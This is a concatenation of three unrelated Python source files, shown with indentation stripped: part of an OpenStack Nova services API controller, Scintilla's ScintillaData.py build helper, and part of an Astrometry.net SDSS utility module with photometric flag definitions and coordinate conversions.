raise webob.exc.HTTPBadRequest(explanation=msg)
host = body['host']
binary = body['binary']
ret_value = {'service': {'host': host,
'binary': binary,
'forced_down': forced_down}}
self._update(context, host, binary, {"forced_down": forced_down})
return ret_value
def _update(self, context, host, binary, payload):
"""Do the actual PUT/update"""
try:
self.host_api.service_update(context, host, binary, payload)
except (exception.HostBinaryNotFound,
exception.HostMappingNotFound) as exc:
raise webob.exc.HTTPNotFound(explanation=exc.format_message())
def _perform_action(self, req, id, body, actions):
"""Calculate action dictionary dependent on provided fields"""
context = req.environ['nova.context']
context.can(services_policies.BASE_POLICY_NAME)
try:
action = actions[id]
except KeyError:
msg = _("Unknown action")
raise webob.exc.HTTPNotFound(explanation=msg)
return action(body, context)
@wsgi.response(204)
@extensions.expected_errors((400, 404))
def delete(self, req, id):
"""Deletes the specified service."""
context = req.environ['nova.context']
context.can(services_policies.BASE_POLICY_NAME)
if api_version_request.is_supported(
req, min_version=UUID_FOR_ID_MIN_VERSION):
if not uuidutils.is_uuid_like(id):
msg = _('Invalid uuid %s') % id
raise webob.exc.HTTPBadRequest(explanation=msg)
else:
try:
utils.validate_integer(id, 'id')
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(
explanation=exc.format_message())
try:
service = self.host_api.service_get_by_id(context, id)
# remove the service from all the aggregates in which it's included
if service.binary == 'nova-compute':
aggrs = self.aggregate_api.get_aggregates_by_host(context,
service.host)
for ag in aggrs:
self.aggregate_api.remove_host_from_aggregate(context,
ag.id,
service.host)
self.host_api.service_delete(context, id)
except exception.ServiceNotFound:
explanation = _("Service %s not found.") % id
raise webob.exc.HTTPNotFound(explanation=explanation)
except exception.ServiceNotUnique:
explanation = _("Service id %s refers to multiple services.") % id
raise webob.exc.HTTPBadRequest(explanation=explanation)
@extensions.expected_errors(())
def index(self, req):
"""Return a list of all running services. Filter by host & service
name
"""
if api_version_request.is_supported(req, min_version='2.11'):
_services = self._get_services_list(req, ['forced_down'])
else:
_services = self._get_services_list(req)
return {'services': _services}
@wsgi.Controller.api_version('2.1', '2.52')
@extensions.expected_errors((400, 404))
@validation.schema(services.service_update, '2.0', '2.10')
@validation.schema(services.service_update_v211, '2.11', '2.52')
def update(self, req, id, body):
"""Perform service update
Before microversion 2.53, the body contains a host and binary value
to identify the service on which to perform the action. There is no
service ID passed on the path, just the action, for example
PUT /os-services/disable.
"""
if api_version_request.is_supported(req, min_version='2.11'):
actions = self.actions.copy()
actions["force-down"] = self._forced_down
else:
actions = self.actions
return self._perform_action(req, id, body, actions)
@wsgi.Controller.api_version(UUID_FOR_ID_MIN_VERSION) # noqa F811
@extensions.expected_errors((400, 404))
@validation.schema(services.service_update_v2_53, UUID_FOR_ID_MIN_VERSION)
def update(self, req, id, body):
"""Perform service update
Starting with microversion 2.53, the service uuid is passed in on the
path of the request to uniquely identify the service record on which to
perform a given update, which is defined in the body of the request.
"""
service_id = id
# Validate that the service ID is a UUID.
if not uuidutils.is_uuid_like(service_id):
msg = _('Invalid uuid %s') % service_id
raise webob.exc.HTTPBadRequest(explanation=msg)
# Validate the request context against the policy.
context = req.environ['nova.context']
context.can(services_policies.BASE_POLICY_NAME)
# Get the service by uuid.
try:
service = self.host_api.service_get_by_id(context, service_id)
# At this point the context is targeted to the cell that the
# service was found in so we don't need to do any explicit cell
# targeting below.
except exception.ServiceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
# Return 400 if service.binary is not nova-compute.
# Before the earlier PUT handlers were made cells-aware, you could
# technically disable a nova-scheduler service, although that doesn't
# really do anything within Nova and is just confusing. Now trying to
# do that will fail as a nova-scheduler service won't have a host
# mapping so you'll get a 404. In this new microversion, we close that
# old gap and make sure you can only enable/disable and set forced_down
# on nova-compute services since those are the only ones that make
# sense to update for those operations.
if service.binary != 'nova-compute':
msg = (_('Updating a %(binary)s service is not supported. Only '
'nova-compute services can be updated.') %
{'binary': service.binary})
raise webob.exc.HTTPBadRequest(explanation=msg)
# Now determine the update to perform based on the body. We are
# intentionally not using _perform_action or the other old-style
# action functions.
if 'status' in body:
# This is a status update for either enabled or disabled.
if body['status'] == 'enabled':
# Fail if 'disabled_reason' was requested when enabling the
# service since those two combined don't make sense.
if body.get('disabled_reason'):
msg = _("Specifying 'disabled_reason' with status "
"'enabled' is invalid.")
raise webob.exc.HTTPBadRequest(explanation=msg)
service.disabled = False
service.disabled_reason = None
elif body['status'] == 'disabled':
service.disabled = True
# The disabled reason is optional.
service.disabled_reason = body.get('disabled_reason')
# This is intentionally not an elif, i.e. it's in addition to the
# status update.
if 'forced_down' in body:
service.forced_down = strutils.bool_from_string(
body['forced_down'], strict=True)
# Check to see if anything was actually updated since the schema does
# not define any required fields.
if not service.obj_what_changed():
msg = _("No updates were requested. Fields 'status' or "
"'forced_down' should be specified.")
raise webob.exc.HTTPBadRequest(explanation=msg)
# Now save our updates to the service record in the database.
service.save()
# Return the full service record details.
additional_fields = ['forced_down']
return {'service': self._get_service_detail(
service, additional_fields, req)}
| |
# ScintillaData.py - implemented 2013 by Neil Hodgson neilh@scintilla.org
# Released to the public domain.
# Common code used by Scintilla and SciTE for source file regeneration.
# The ScintillaData object exposes information about Scintilla as properties:
# Version properties
# version
# versionDotted
# versionCommad
#
# Date last modified
# dateModified
# yearModified
# mdyModified
# dmyModified
# myModified
#
# Information about lexers and properties defined in lexers
# lexFiles
# sorted list of lexer files
# lexerModules
# sorted list of module names
# lexerProperties
# sorted list of lexer properties
# propertyDocuments
# dictionary of property documentation { name: document string }
# sclexFromName
# dictionary of SCLEX_* IDs { name: SCLEX_ID }
# fileFromSclex
# dictionary of file names { SCLEX_ID: file name }
# This file can be run to see the data it provides.
# Requires Python 2.7 or later
from __future__ import with_statement
import codecs, datetime, glob, os, sys, textwrap
import FileGenerator
def FindModules(lexFile):
modules = []
partLine = ""
with open(lexFile) as f:
for l in f.readlines():
l = l.rstrip()
if partLine or l.startswith("LexerModule"):
if ")" in l:
l = partLine + l
l = l.replace("(", " ")
l = l.replace(")", " ")
l = l.replace(",", " ")
parts = l.split()
modules.append([parts[1], parts[2], parts[4][1:-1]])
partLine = ""
else:
partLine = partLine + l
return modules
def FindLexersInXcode(xCodeProject):
lines = FileGenerator.ReadFileAsList(xCodeProject)
uidsOfBuild = {}
markersPBXBuildFile = ["Begin PBXBuildFile section", "", "End PBXBuildFile section"]
for buildLine in lines[FileGenerator.FindSectionInList(lines, markersPBXBuildFile)]:
# Occurs for each file in the build. Find the UIDs used for the file.
#\t\t[0-9A-F]+ /* [a-zA-Z]+.cxx in sources */ = {isa = PBXBuildFile; fileRef = [0-9A-F]+ /* [a-zA-Z]+ */; };
pieces = buildLine.split()
uid1 = pieces[0]
filename = pieces[2].split(".")[0]
uid2 = pieces[12]
uidsOfBuild[filename] = [uid1, uid2]
lexers = {}
markersLexers = ["/* Lexers */ =", "children", ");"]
for lexerLine in lines[FileGenerator.FindSectionInList(lines, markersLexers)]:
#\t\t\t\t[0-9A-F]+ /* [a-zA-Z]+.cxx */,
uid, _, rest = lexerLine.partition("/* ")
uid = uid.strip()
lexer, _, _ = rest.partition(".")
lexers[lexer] = uidsOfBuild[lexer]
return lexers
# Properties that start with lexer. or fold. are automatically found but there are some
# older properties that don't follow this pattern so must be explicitly listed.
knownIrregularProperties = [
"fold",
"styling.within.preprocessor",
"tab.timmy.whinge.level",
"asp.default.language",
"html.tags.case.sensitive",
"ps.level",
"ps.tokenize",
"sql.backslash.escapes",
"nsis.uservars",
"nsis.ignorecase"
]
def FindProperties(lexFile):
properties = {}
with open(lexFile) as f:
for l in f.readlines():
if ("GetProperty" in l or "DefineProperty" in l) and "\"" in l:
l = l.strip()
if not l.startswith("//"): # Drop comments
propertyName = l.split("\"")[1]
if propertyName.lower() == propertyName:
# Only allow lower case property names
if propertyName in knownIrregularProperties or \
propertyName.startswith("fold.") or \
propertyName.startswith("lexer."):
properties[propertyName] = 1
return properties
def FindPropertyDocumentation(lexFile):
documents = {}
with open(lexFile) as f:
name = ""
for l in f.readlines():
l = l.strip()
if "// property " in l:
propertyName = l.split()[2]
if propertyName.lower() == propertyName:
# Only allow lower case property names
name = propertyName
documents[name] = ""
elif "DefineProperty" in l and "\"" in l:
propertyName = l.split("\"")[1]
if propertyName.lower() == propertyName:
# Only allow lower case property names
name = propertyName
documents[name] = ""
elif name:
if l.startswith("//"):
if documents[name]:
documents[name] += " "
documents[name] += l[2:].strip()
elif l.startswith("\""):
l = l[1:].strip()
if l.endswith(";"):
l = l[:-1].strip()
if l.endswith(")"):
l = l[:-1].strip()
if l.endswith("\""):
l = l[:-1]
# Fix escaped double quotes
l = l.replace("\\\"", "\"")
documents[name] += l
else:
name = ""
for name in list(documents.keys()):
if documents[name] == "":
del documents[name]
return documents
def FindCredits(historyFile):
credits = []
stage = 0
with codecs.open(historyFile, "r", "utf-8") as f:
for l in f.readlines():
l = l.strip()
if stage == 0 and l == "<table>":
stage = 1
elif stage == 1 and l == "</table>":
stage = 2
if stage == 1 and l.startswith("<td>"):
credit = l[4:-5]
if "<a" in l:
title, a, rest = credit.partition("<a href=")
urlplus, bracket, end = rest.partition(">")
name = end.split("<")[0]
url = urlplus[1:-1]
credit = title.strip()
if credit:
credit += " "
credit += name + " " + url
credits.append(credit)
return credits
def ciCompare(a,b):
return cmp(a.lower(), b.lower())
def ciKey(a):
return a.lower()
def SortListInsensitive(l):
try: # Try key function
l.sort(key=ciKey)
except TypeError: # Earlier version of Python, so use comparison function
l.sort(ciCompare)
class ScintillaData:
def __init__(self, scintillaRoot):
# Discover version information
with open(scintillaRoot + "version.txt") as f:
self.version = f.read().strip()
self.versionDotted = self.version[0] + '.' + self.version[1] + '.' + \
self.version[2]
self.versionCommad = self.versionDotted.replace(".", ", ") + ', 0'
with open(scintillaRoot + "doc/index.html") as f:
self.dateModified = [l for l in f.readlines() if "Date.Modified" in l]\
[0].split('\"')[3]
# 20130602
# index.html, SciTE.html
dtModified = datetime.datetime.strptime(self.dateModified, "%Y%m%d")
self.yearModified = self.dateModified[0:4]
monthModified = dtModified.strftime("%B")
dayModified = "%d" % dtModified.day
self.mdyModified = monthModified + " " + dayModified + " " + self.yearModified
# May 22 2013
# index.html, SciTE.html
self.dmyModified = dayModified + " " + monthModified + " " + self.yearModified
# 22 May 2013
# ScintillaHistory.html -- only first should change
self.myModified = monthModified + " " + self.yearModified
# Find all the lexer source code files
lexFilePaths = glob.glob(scintillaRoot + "lexers/Lex*.cxx")
SortListInsensitive(lexFilePaths)
self.lexFiles = [os.path.basename(f)[:-4] for f in lexFilePaths]
self.lexerModules = []
lexerProperties = set()
self.propertyDocuments = {}
self.sclexFromName = {}
self.fileFromSclex = {}
for lexFile in lexFilePaths:
modules = FindModules(lexFile)
for module in modules:
self.sclexFromName[module[2]] = module[1]
self.fileFromSclex[module[1]] = lexFile
self.lexerModules.append(module[0])
for k in FindProperties(lexFile).keys():
lexerProperties.add(k)
documents = FindPropertyDocumentation(lexFile)
for k in documents.keys():
if k not in self.propertyDocuments:
self.propertyDocuments[k] = documents[k]
SortListInsensitive(self.lexerModules)
self.lexerProperties = list(lexerProperties)
SortListInsensitive(self.lexerProperties)
self.lexersXcode = FindLexersInXcode(scintillaRoot + "cocoa/ScintillaFramework/ScintillaFramework.xcodeproj/project.pbxproj")
self.credits = FindCredits(scintillaRoot + "doc/ScintillaHistory.html")
def printWrapped(text):
print(textwrap.fill(text, subsequent_indent=" "))
if __name__=="__main__":
sci = ScintillaData("../")
print("Version %s %s %s" % (sci.version, sci.versionDotted, sci.versionCommad))
print("Date last modified %s %s %s %s %s" % (
sci.dateModified, sci.yearModified, sci.mdyModified, sci.dmyModified, sci.myModified))
printWrapped(str(len(sci.lexFiles)) + " lexer files: " + ", ".join(sci.lexFiles))
printWrapped(str(len(sci.lexerModules)) + " lexer modules: " + ", ".join(sci.lexerModules))
#~ printWrapped(str(len(sci.lexersXcode)) + " Xcode lexer references: " + ", ".join(
#~ [lex+":"+uids[0]+","+uids[1] for lex, uids in sci.lexersXcode.items()]))
print("Lexer name to ID:")
lexNames = sorted(sci.sclexFromName.keys())
for lexName in lexNames:
sclex = sci.sclexFromName[lexName]
fileName = os.path.basename(sci.fileFromSclex[sclex])
print(" " + lexName + " -> " + sclex + " in " + fileName)
printWrapped("Lexer properties: " + ", ".join(sci.lexerProperties))
print("Lexer property documentation:")
documentProperties = list(sci.propertyDocuments.keys())
SortListInsensitive(documentProperties)
for k in documentProperties:
print(" " + k)
print(textwrap.fill(sci.propertyDocuments[k], initial_indent=" ",
subsequent_indent=" "))
print("Credits:")
for c in sci.credits:
if sys.version_info[0] == 2:
print(" " + c.encode("utf-8"))
else:
sys.stdout.buffer.write(b" " + c.encode("utf-8") + b"\n")
| |
# This file is part of the Astrometry.net suite.
# Licensed under a 3-clause BSD style license - see LICENSE
from __future__ import print_function
import os
from astrometry.util.fits import fits_table
from astrometry.util.miscutils import get_overlapping_region
import numpy as np
from functools import reduce
try:
import cutils
except:
cutils = None
cas_flags = dict(
CANONICAL_CENTER = 0x0000000000000001,
BRIGHT = 0x0000000000000002,
EDGE = 0x0000000000000004,
BLENDED = 0x0000000000000008,
CHILD = 0x0000000000000010,
PEAKCENTER = 0x0000000000000020,
NODEBLEND = 0x0000000000000040,
NOPROFILE = 0x0000000000000080,
NOPETRO = 0x0000000000000100,
MANYPETRO = 0x0000000000000200,
NOPETRO_BIG = 0x0000000000000400,
DEBLEND_TOO_MANY_PEAKS = 0x0000000000000800,
COSMIC_RAY = 0x0000000000001000,
MANYR50 = 0x0000000000002000,
MANYR90 = 0x0000000000004000,
BAD_RADIAL = 0x0000000000008000,
INCOMPLETE_PROFILE = 0x0000000000010000,
INTERP = 0x0000000000020000,
SATURATED = 0x0000000000040000,
NOTCHECKED = 0x0000000000080000,
SUBTRACTED = 0x0000000000100000,
NOSTOKES = 0x0000000000200000,
BADSKY = 0x0000000000400000,
PETROFAINT = 0x0000000000800000,
TOO_LARGE = 0x0000000001000000,
DEBLENDED_AS_PSF = 0x0000000002000000,
DEBLEND_PRUNED = 0x0000000004000000,
ELLIPFAINT = 0x0000000008000000,
BINNED1 = 0x0000000010000000,
BINNED2 = 0x0000000020000000,
BINNED4 = 0x0000000040000000,
MOVED = 0x0000000080000000,
DEBLENDED_AS_MOVING = 0x0000000100000000,
NODEBLEND_MOVING = 0x0000000200000000,
TOO_FEW_DETECTIONS = 0x0000000400000000,
BAD_MOVING_FIT = 0x0000000800000000,
STATIONARY = 0x0000001000000000,
PEAKS_TOO_CLOSE = 0x0000002000000000,
MEDIAN_CENTER = 0x0000004000000000,
LOCAL_EDGE = 0x0000008000000000,
BAD_COUNTS_ERROR = 0x0000010000000000,
BAD_MOVING_FIT_CHILD = 0x0000020000000000,
DEBLEND_UNASSIGNED_FLUX = 0x0000040000000000,
SATUR_CENTER = 0x0000080000000000,
INTERP_CENTER = 0x0000100000000000,
DEBLENDED_AT_EDGE = 0x0000200000000000,
DEBLEND_NOPEAK = 0x0000400000000000,
PSF_FLUX_INTERP = 0x0000800000000000,
TOO_FEW_GOOD_DETECTIONS = 0x0001000000000000,
CENTER_OFF_AIMAGE = 0x0002000000000000,
DEBLEND_DEGENERATE = 0x0004000000000000,
BRIGHTEST_GALAXY_CHILD = 0x0008000000000000,
CANONICAL_BAND = 0x0010000000000000,
AMOMENT_FAINT = 0x0020000000000000,
AMOMENT_SHIFT = 0x0040000000000000,
AMOMENT_MAXITER = 0x0080000000000000,
MAYBE_CR = 0x0100000000000000,
MAYBE_EGHOST = 0x0200000000000000,
NOTCHECKED_CENTER = 0x0400000000000000,
OBJECT2_HAS_SATUR_DN = 0x0800000000000000,
OBJECT2_DEBLEND_PEEPHOLE = 0x1000000000000000,
GROWN_MERGED = 0x2000000000000000,
HAS_CENTER = 0x4000000000000000,
RESERVED = 0x8000000000000000,
)
# From:
# http://www.sdss3.org/svn/repo/idlutils/trunk/data/sdss/sdssMaskbits.par
# via
# s = open('sdssMaskbits.par').read()
# bits = []
# for line in s.split('\n'):
# sp = line.split()
# line = (int(sp[2]), sp[3], ' '.join(sp[4:]))
# bits.append(line)
# print repr(bits).replace('), ', '),\n ')
#
photo_flags1_info = [
# masktype OBJECT1 32 "Object flags from photo reductions for SDSS (first 32)"
(0, 'CANONICAL_CENTER', '"The quantities (psf counts, model fits and likelihoods) that are usually determined at an object\'s center as determined band-by-band were in fact determined at the canonical center (suitably transformed). This is due to the object being to close to the edge to extract a profile at the local center, and OBJECT1_EDGE is also set."'),
(1, 'BRIGHT', '"Indicates that the object was detected as a bright object. Since these are typically remeasured as faint objects, most users can ignore BRIGHT objects."'),
(2, 'EDGE', '"Object is too close to edge of frame in this band."'),
(3, 'BLENDED', '"Object was determined to be a blend. The flag is set if: more than one peak is detected within an object in a single band together; distinct peaks are found when merging different colours of one object together; or distinct peaks result when merging different objects together. "'),
(4, 'CHILD', '"Object is a child, created by the deblender."'),
(5, 'PEAKCENTER', '"Given center is position of peak pixel, as attempts to determine a better centroid failed."'),
(6, 'NODEBLEND', '"Although this object was marked as a blend, no deblending was attempted."'),
(7, 'NOPROFILE', '"Frames couldn\'t extract a radial profile."'),
(8, 'NOPETRO', '" No Petrosian radius or other Petrosian quanties could be measured."'),
(9, 'MANYPETRO', '"Object has more than one possible Petrosian radius."'),
(10, 'NOPETRO_BIG', '"The Petrosian ratio has not fallen to the value at which the Petrosian radius is defined at the outermost point of the extracted radial profile. NOPETRO is set, and the Petrosian radius is set to the outermost point in the profile."'),
(11, 'DEBLEND_TOO_MANY_PEAKS', '"The object had the OBJECT1_DEBLEND flag set, but it contained too many candidate children to be fully deblended. This flag is only set in the parent, i.e. the object with too many peaks."'),
(12, 'CR', '"Object contains at least one pixel which was contaminated by a cosmic ray. The OBJECT1_INTERP flag is also set. This flag does not mean that this object is a cosmic ray; rather it means that a cosmic ray has been removed. "'),
(13, 'MANYR50', '" More than one radius was found to contain 50% of the Petrosian flux. (For this to happen part of the radial profile must be negative)."'),
(14, 'MANYR90', '"More than one radius was found to contain 90% of the Petrosian flux. (For this to happen part of the radial profile must be negative)."'),
(15, 'BAD_RADIAL', '" Measured profile includes points with a S/N <= 0. In practice this flag is essentially meaningless."'),
(16, 'INCOMPLETE_PROFILE', '"A circle, centerd on the object, of radius the canonical Petrosian radius extends beyond the edge of the frame. The radial profile is still measured from those parts of the object that do lie on the frame."'),
(17, 'INTERP', '" The object contains interpolated pixels (e.g. cosmic rays or bad columns)."'),
(18, 'SATUR', '"The object contains saturated pixels; INTERP is also set."'),
(19, 'NOTCHECKED', '"Object includes pixels that were not checked for peaks, for example the unsmoothed edges of frames, and the cores of subtracted or saturated stars."'),
(20, 'SUBTRACTED', '"Object (presumably a star) had wings subtracted."'),
(21, 'NOSTOKES', '"Object has no measured Stokes parameters."'),
(22, 'BADSKY', '"The estimated sky level is so bad that the central value of the radial profile is crazily negative; this is usually the result of the subtraction of the wings of bright stars failing."'),
(23, 'PETROFAINT', '"At least one candidate Petrosian radius occured at an unacceptably low surface brightness."'),
(24, 'TOO_LARGE', '" The object is (as it says) too large. Either the object is still detectable at the outermost point of the extracted radial profile (a radius of approximately 260 arcsec), or when attempting to deblend an object, at least one child is larger than half a frame (in either row or column)."'),
(25, 'DEBLENDED_AS_PSF', '"When deblending an object, in this band this child was treated as a PSF."'),
(26, 'DEBLEND_PRUNED', '"When solving for the weights to be assigned to each child the deblender encountered a nearly singular matrix, and therefore deleted at least one of them."'),
(27, 'ELLIPFAINT', '"No isophotal fits were performed."'),
(28, 'BINNED1', '"The object was detected in an unbinned image."'),
(29, 'BINNED2', '" The object was detected in a 2x2 binned image after all unbinned detections have been replaced by the background level."'),
(30, 'BINNED4', '"The object was detected in a 4x4 binned image. The objects detected in the 2x2 binned image are not removed before doing this."'),
(31, 'MOVED', '"The object appears to have moved during the exposure. Such objects are candidates to be deblended as moving objects."'),
]
photo_flags2_info = [
(0, 'DEBLENDED_AS_MOVING', '"The object has the MOVED flag set, and was deblended on the assumption that it was moving."'),
(1, 'NODEBLEND_MOVING', '"The object has the MOVED flag set, but was not deblended as a moving object."'),
(2, 'TOO_FEW_DETECTIONS', '"The object has the MOVED flag set, but has too few detection to be deblended as moving."'),
(3, 'BAD_MOVING_FIT', '"The fit to the object as a moving object is too bad to be believed."'),
(4, 'STATIONARY', '"A moving objects velocity is consistent with zero"'),
(5, 'PEAKS_TOO_CLOSE', '"Peaks in object were too close (set only in parent objects)."'),
(6, 'BINNED_CENTER', '"When centroiding the object the object\'s size is larger than the (PSF) filter used to smooth the image."'),
(7, 'LOCAL_EDGE', '"The object\'s center in some band was too close to the edge of the frame to extract a profile."'),
(8, 'BAD_COUNTS_ERROR', '"An object containing interpolated pixels had too few good pixels to form a reliable estimate of its error"'),
(9, 'BAD_MOVING_FIT_CHILD', '"A putative moving child\'s velocity fit was too poor, so it was discarded, and the parent was not deblended as moving"'),
(10, 'DEBLEND_UNASSIGNED_FLUX', '"After deblending, the fraction of flux assigned to none of the children was too large (this flux is then shared out as described elsewhere)."'),
(11, 'SATUR_CENTER', '"An object\'s center is very close to at least one saturated pixel; the object may well be causing the saturation."'),
(12, 'INTERP_CENTER', '"An object\'s center is very close to at least one interpolated pixel."'),
(13, 'DEBLENDED_AT_EDGE', '"An object so close to the edge of the frame that it would not ordinarily be deblended has been deblended anyway. Only set for objects large enough to be EDGE in all fields/strips."'),
(14, 'DEBLEND_NOPEAK', '"A child had no detected peak in a given band, but we centroided it anyway and set the BINNED1"'),
(15, 'PSF_FLUX_INTERP', '"The fraction of light actually detected (as opposed to guessed at by the interpolator) was less than some number (currently 80%) of the total."'),
(16, 'TOO_FEW_GOOD_DETECTIONS', '"A child of this object had too few good detections to be deblended as moving."'),
(17, 'CENTER_OFF_AIMAGE', '"At least one peak\'s center lay off the atlas image in some band. This can happen when the object\'s being deblended as moving, or if the astrometry is badly confused."'),
(18, 'DEBLEND_DEGENERATE', '"At least one potential child has been pruned because its template was too similar to some other child\'s template."'),
(19, 'BRIGHTEST_GALAXY_CHILD', '"This is the brightest child galaxy in a blend."'),
(20, 'CANONICAL_BAND', '"This band was the canonical band. This is the band used to measure the Petrosian radius used to calculate the Petrosian counts in each band, and to define the model used to calculate model colors; it has no effect upon the coordinate system used for the OBJC center."'),
(21, 'AMOMENT_UNWEIGHTED', '"`Adaptive\' moments are actually unweighted."'),
(22, 'AMOMENT_SHIFT', '"Object\'s center moved too far while determining adaptive moments. In this case, the M_e1 and M_e2 give the (row, column) shift, not the object\'s shape."'),
(23, 'AMOMENT_MAXITER', '"Too many iterations while determining adaptive moments."'),
(24, 'MAYBE_CR', '"This object may be a cosmic ray. This bit can get set in the cores of bright stars, and is quite likely to be set for the cores of saturated stars."'),
(25, 'MAYBE_EGHOST', '"Object appears in the right place to be an electronics ghost."'),
(26, 'NOTCHECKED_CENTER', '"Center of object lies in a NOTCHECKED region. The object is almost certainly bogus."'),
(27, 'HAS_SATUR_DN', '"This object is saturated in this band and the bleed trail doesn\'t touch the edge of the frame, we we\'ve made an attempt to add up all the flux in the bleed trails, and to include it in the object\'s photometry. "'),
(28, 'DEBLEND_PEEPHOLE', '"The deblend was modified by the optimizer"'),
(29, 'SPARE3', '""'),
(30, 'SPARE2', '""'),
(31, 'SPARE1', '""'),
]
specobj_boss_target1_info = [
# masktype BOSS_TARGET1 64 "BOSS survey primary target selection flags"
# galaxies
(0, 'GAL_LOZ', "low-z lrgs"),
(1, 'GAL_CMASS', "dperp > 0.55, color-mag cut"),
(2, 'GAL_CMASS_COMM', "dperp > 0.55, commissioning color-mag cut"),
(3, 'GAL_CMASS_SPARSE', "GAL_CMASS_COMM & (!GAL_CMASS) & (i < 19.9) sparsely sampled"),
(6, 'SDSS_KNOWN', "Matches a known SDSS spectra"),
(7, 'GAL_CMASS_ALL', "GAL_CMASS and the entire sparsely sampled region"),
(8, 'GAL_IFIBER2_FAINT', "ifiber2 > 21.5, extinction corrected. Used after Nov 2010"),
# galaxies deprecated
#maskbits BOSS_TARGET1 3 GAL_GRRED "red in g-r"
#maskbits BOSS_TARGET1 4 GAL_TRIANGLE "GAL_HIZ and !GAL_CMASS"
#maskbits BOSS_TARGET1 5 GAL_LODPERP "Same as hiz but between dperp00 and dperp0"
# qsos (1)
(10, 'QSO_CORE', "restrictive qso selection: commissioning only"),
(11, 'QSO_BONUS', "permissive qso selection: commissioning only"),
(12, 'QSO_KNOWN_MIDZ', "known qso between [2.2,9.99]"),
(13, 'QSO_KNOWN_LOHIZ', "known qso outside of miz range. never target"),
(14, 'QSO_NN', "Neural Net that match to sweeps/pass cuts"),
(15, 'QSO_UKIDSS', "UKIDSS stars that match sweeps/pass flag cuts"),
(16, 'QSO_KDE_COADD', "kde targets from the stripe82 coadd"),
(17, 'QSO_LIKE', "likelihood method"),
(18, 'QSO_FIRST_BOSS', "FIRST radio match"),
(19, 'QSO_KDE', "selected by kde+chi2"),
# standards
(20, 'STD_FSTAR', "standard f-stars"),
(21, 'STD_WD', "white dwarfs"),
(22, 'STD_QSO', "qso"),
# template stars
(32, 'TEMPLATE_GAL_PHOTO', "galaxy templates"),
(33, 'TEMPLATE_QSO_SDSS1', "QSO templates"),
(34, 'TEMPLATE_STAR_PHOTO', "stellar templates"),
(35, 'TEMPLATE_STAR_SPECTRO', "stellar templates (spectroscopically known)"),
# qsos (2)
(40, 'QSO_CORE_MAIN', "Main survey core sample"),
(41, 'QSO_BONUS_MAIN', "Main survey bonus sample"),
(42, 'QSO_CORE_ED', "Extreme Deconvolution in Core"),
(43, 'QSO_CORE_LIKE', "Likelihood that make it into core"),
(44, 'QSO_KNOWN_SUPPZ', "known qso between [1.8,2.15]"),
]
specobj_boss_target1_map = dict([(nm, 1<<bit)
for bit,nm,desc in specobj_boss_target1_info])
photo_flags1_map = dict([(nm, 1<<bit)
for bit,nm,desc in photo_flags1_info])
photo_flags2_map = dict([(nm, 1<<bit)
for bit,nm,desc in photo_flags2_info])
def band_names():
return ['u','g','r','i','z']
def band_name(b):
if b in band_names():
return b
if b in [0,1,2,3,4]:
return 'ugriz'[b]
raise Exception('Invalid SDSS band: "' + str(b) + '"')
def band_index(b):
if b in band_names():
return 'ugriz'.index(b)
if b in [0,1,2,3,4]:
return b
raise Exception('Invalid SDSS band: "' + str(b) + '"')
class SdssDR(object):
def __init__(self, curl=False, basedir=None):
self.curl = curl
self.basedir = basedir
self.filenames = {}
def getDRNumber(self):
return -1
def getFilename(self, filetype, *args, **kwargs):
for k,v in zip(['run', 'camcol', 'field', 'band'], args):
kwargs[k] = v
# convert band number to band character.
if 'band' in kwargs and kwargs['band'] is not None:
kwargs['band'] = band_name(kwargs['band'])
if not filetype in self.filenames:
return None
pat = self.filenames[filetype]
if kwargs.get('rerun', None) is None:
run = kwargs.get('run', None)
rerun = self.get_rerun(run)
kwargs.update(rerun=rerun)
fn = pat % kwargs
return fn
def get_rerun(self, run, field=None):
return None
def getPath(self, *args, **kwargs):
fn = self.getFilename(*args, **kwargs)
if fn is None:
return None
if self.basedir is not None:
fn = os.path.join(self.basedir, fn)
return fn
def setBasedir(self, dirnm):
self.basedir = dirnm
def _open(self, fn):
if self.basedir is not None:
path = os.path.join(self.basedir, fn)
else:
path = fn
try:
import fitsio
return fitsio_wrapper(fitsio.FITS(path))
except ImportError:
pass
try:
import pyfits
except ImportError:
try:
from astropy.io import fits as pyfits
except ImportError:
raise ImportError("Cannot import either pyfits or astropy.io.fits")
return pyfits.open(path)
class fitsio_wrapper(object):
def __init__(self, F):
self.F = F
def __getitem__(self, k):
hdu = self.F[k]
hdu.data = hdu
return hdu
class SdssFile(object):
def __init__(self, run=None, camcol=None, field=None, band=None, rerun=None,
**kwargs):
'''
band: string ('u', 'g', 'r', 'i', 'z')
'''
self.run = run
self.camcol = camcol
self.field = field
if band is not None:
self.band = band_name(band)
self.bandi = band_index(band)
if rerun is not None:
self.rerun = rerun
self.filetype = 'unknown'
def getRun(self):
return self.__dict__.get('run', 0)
def getCamcol(self):
return self.__dict__.get('camcol', 0)
def getField(self):
return self.__dict__.get('field', 0)
def __str__(self):
s = 'SDSS ' + self.filetype
s += ' %i-%i-%i' % (self.getRun(), self.getCamcol(), self.getField())
if hasattr(self, 'band'):
s += '-%s' % self.band
return s
def munu_to_radec_rad(mu, nu, node, incl):
'''
Converts SDSS survey coords (mu,nu) into RA,Dec.
This function requires mu, nu, node, incl to be in RADIANS.
See munu_to_radec_deg for DEGREES.
'''
ra = node + np.arctan2(np.sin(mu - node) * np.cos(nu) * np.cos(incl) -
np.sin(nu) * np.sin(incl),
np.cos(mu - node) * np.cos(nu))
dec = np.arcsin(np.sin(mu - node) * np.cos(nu) * np.sin(incl) +
np.sin(nu) * np.cos(incl))
return ra,dec
def munu_to_radec_deg(mu, nu, node, incl):
'''
Converts SDSS survey coords (mu,nu) into RA,Dec.
This function requires mu, nu, node, incl to be in DEGREES.
See munu_to_radec_rad for RADIANS.
'''
mu, nu = np.deg2rad(mu), np.deg2rad(nu)
node, incl = np.deg2rad(node), np.deg2rad(incl)
ra,dec = munu_to_radec_rad(mu, nu, node, incl)
ra, dec = np.rad2deg(ra), np.rad2deg(dec)
ra += (360. * (ra < 0))
ra -= (360. * (ra > 360))
return (ra, dec)
# makes an SDSS AsTrans WCS object look like an anwcs / Tan / Sip
class AsTransWrapper(object):
def __init__(self, wcs, w, h, x0=0, y0=0):
self.wcs = wcs
self.imagew = w
self.imageh = h
self.x0 = x0
self.y0 = y0
def pixelxy2radec(self, x, y):
r,d = self.wcs.pixel_to_radec(x+self.x0-1, y+self.y0-1)
return r, d
def radec2pixelxy(self, ra, dec):
x,y = self.wcs.radec_to_pixel(ra, dec)
return True, x-self.x0+1, y-self.y0+1
